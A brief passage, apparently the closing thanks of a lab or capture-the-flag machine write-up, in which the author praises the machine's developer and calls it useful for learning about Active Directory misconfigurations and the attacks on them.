I want to start by expressing my gratitude to the machine developer. This machine has taught me a lot of things, and it is useful for anyone who wants to learn about AD misconfigurations and the attacks associated with them. I enjoyed every step of the process of deciphering this machine, and I hope to see more machines of this kind in the future.